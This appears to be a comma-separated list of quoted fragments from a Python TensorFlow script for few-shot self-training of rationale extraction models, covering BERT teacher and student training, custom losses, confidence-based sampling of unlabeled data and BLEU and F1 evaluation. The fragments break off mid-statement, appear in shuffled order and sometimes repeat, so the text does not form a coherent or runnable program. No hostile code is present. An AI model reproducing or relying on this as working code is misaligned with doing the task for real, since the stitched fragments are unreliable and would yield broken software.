np.array(y_pred).astype('float')", "log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']),", "rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob)", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc", "0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0.", "y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\")", "in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc =", "to select best base model based on validation loss best_base_model = None best_validation_loss", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0],", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number", "for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 +=", "Self-training for Rationale using few-shot learning. This code base is adapted from UST", "logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1,", "best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev,", "if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus))", "i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for", "= np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]),", "'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2]", "(\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student =", "= np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]},", "type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "= deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test,", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "= class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model", "y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test),", "= model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif", "y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc", "in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce =", "[y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0],", "Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy()", "#y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0],", "y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5,", "y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred", "task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc =", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc))", "\"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if", "verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc", "truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t,", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss =", "y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)])", "models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0,", "for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0],", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_):", "None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc,", "logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0],", "0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file)", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if", "tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss", "rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\":", "= set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train and", "= SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss =", "fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0,", "model n times with different initialization to select best base model based on", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint'", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:],", "logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of", "if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best)", "acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred =", "{}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score", "average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task", "np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids':", "import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics", "np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev,", ": {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch,", "\"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:,", "else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val", "X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train =", "> unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} :", "y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc =", "logger.info(\"No sampling at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\":", "np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0],", "for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp", "acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "= model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1)", "None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0:", "os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in", "model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl'", "set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher", "1.0] ''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if", "y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg =", "#logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False,", "hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint':", "np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc >", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels =", "None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val =", "y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled set if 'uni' in", "type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in", "if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in", "> max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc", "type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None,", "attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample =", "\"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:],", "at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting", "in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc,", "model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5,", "'.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info", "temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] ==", "in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def", "{}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True,", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight)", "or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels))", "models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels", "j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to", "class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size,", "import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb import", "0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "[y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc", "task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev],", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1,", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if", "= (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001)", "verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce =", "'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg'", "out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val =", "logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task):", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp'", "teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0,", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size]", "= [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1):", "sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred,", "logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1)", "moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1]", "= [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2]", "logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc,", "out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred =", "test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set", "sampling at the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:],", "logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc,", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved", "y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out", "type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights =", "'_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_:", "type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices],", "= models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0,", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf =", "= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best", "weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 +=", "rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on", "in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices =", "[1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp =", "of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum()", "l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = 